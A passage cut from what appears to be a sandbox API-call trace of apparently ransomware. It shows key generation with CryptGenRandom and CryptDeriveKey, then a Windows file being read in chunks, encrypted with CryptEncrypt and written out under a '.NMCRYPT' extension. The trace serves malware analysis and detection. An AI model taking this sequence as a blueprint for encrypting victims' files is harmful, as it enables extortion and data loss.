pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.576] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.577] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.578] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.578] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.578] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0147.578] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.579] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad2f8) returned 1 [0147.579] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.579] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.579] wcslen (_String="\\\\?\\") returned 0x4 [0147.579] CryptDuplicateKey (in: hKey=0x9ad2f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad8b8) returned 1 [0147.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.579] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2652) returned 1 [0147.579] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.580] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.581] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.581] GetLastError () returned 0x0 [0147.581] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.582] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.582] GetLastError () returned 0x0 [0147.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.582] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.582] GetLastError () returned 0x0 [0147.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.582] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.582] GetLastError () returned 0x0 [0147.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.582] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.582] GetLastError () returned 0x0 [0147.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.582] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.582] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.582] GetLastError () returned 0x0 [0147.582] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.583] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.583] GetLastError () returned 0x0 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.583] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.583] GetLastError () returned 0x0 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.583] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.583] GetLastError () returned 0x0 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.583] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.583] GetLastError () returned 0x0 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x5c, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x5c, lpOverlapped=0x0) returned 1 [0147.583] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x5c, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x60) returned 1 [0147.583] GetLastError () returned 0x0 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x60, lpOverlapped=0x0) returned 1 [0147.583] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.583] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, 